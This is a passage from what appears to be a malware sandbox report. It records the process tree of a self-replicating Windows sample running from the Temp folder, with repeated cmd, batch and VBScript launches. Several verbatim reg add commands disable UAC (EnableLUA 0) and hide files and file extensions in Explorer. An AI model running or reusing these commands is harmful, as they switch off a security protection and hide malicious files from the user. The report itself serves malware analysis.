        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        185⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        186⤵
        
        PID:4156
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        187⤵
        
        PID:4044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        188⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        187⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        188⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        189⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        190⤵
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        191⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        192⤵
        
        PID:3080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        193⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        194⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        195⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        196⤵
        
        PID:3676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        197⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        197⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        198⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        199⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        200⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        201⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        202⤵
        
        PID:2120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        203⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        204⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        205⤵
        
        PID:1584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        206⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:1060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        207⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        207⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        208⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        209⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        210⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        211⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        212⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        213⤵
        
        PID:4192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        214⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        215⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        216⤵
        
        PID:2428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        217⤵
        
        PID:1016
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        217⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        218⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        219⤵
        
        PID:2188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        220⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        221⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        222⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        223⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        223⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        224⤵
        
        PID:4748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        225⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        225⤵
        
        PID:772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        226⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        227⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        228⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        229⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        230⤵
        
        PID:1212
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        231⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        232⤵
        
        PID:1564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        233⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        233⤵
        
        PID:4156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        234⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        235⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        236⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        237⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4896
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        238⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        239⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        240⤵
        
        PID:2660
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        241⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        241⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        242⤵
        
        PID:456
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        243⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        244⤵
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        245⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        246⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        247⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        248⤵
        
        PID:4272
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        249⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        249⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:3124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        250⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        251⤵
        
        PID:4088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        252⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        253⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        254⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        255⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        256⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        257⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        258⤵
        
        PID:3960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        259⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        258⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QGsQUAck.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        258⤵
        
        PID:980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        258⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        258⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\twckgsss.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        256⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        257⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        256⤵
        UAC bypass
        
        PID:3500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        256⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        256⤵
        
        PID:396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        254⤵
        Modifies registry key
        
        PID:2704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eKUEQIkM.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        254⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        255⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        254⤵
        
        PID:4072
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        255⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        254⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        252⤵
        
        PID:2912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        253⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        252⤵
        
        PID:1756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EGkkQwog.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        252⤵
        
        PID:4156
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        253⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        252⤵
        UAC bypass
        
        PID:3764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        250⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        250⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        250⤵
        UAC bypass
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uaMwQIoU.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        250⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        251⤵
        
        PID:788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        248⤵
        
        PID:5024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KiQMcUkw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        248⤵
        
        PID:2804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        249⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:3736
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        249⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        248⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        248⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        246⤵
        
        PID:4892
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        247⤵
        
        PID:220
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        246⤵
        
        PID:5068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        247⤵
        
        PID:488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        246⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QAkIAYII.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        246⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4944
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        247⤵
        
        PID:1028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        244⤵
        
        PID:2704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        245⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oCUUAEsk.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        244⤵
        
        PID:3096
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        245⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        244⤵
        UAC bypass
        Modifies registry key
        
        PID:3740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        244⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        242⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        242⤵
        
        PID:2596
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        243⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        242⤵
        
        PID:4756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UeUcwIkw.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        242⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        243⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        240⤵
        UAC bypass
        
        PID:3596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RCwAQcow.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        240⤵
        
        PID:708
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        241⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        241⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        240⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        240⤵
        
        PID:668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        241⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        238⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        238⤵
        
        PID:4988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        239⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        238⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JAoYkIoY.bat" "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe""
        238⤵
        
        PID:3468
        
        C:\Windows\SysWOW64\cscript.exe
        
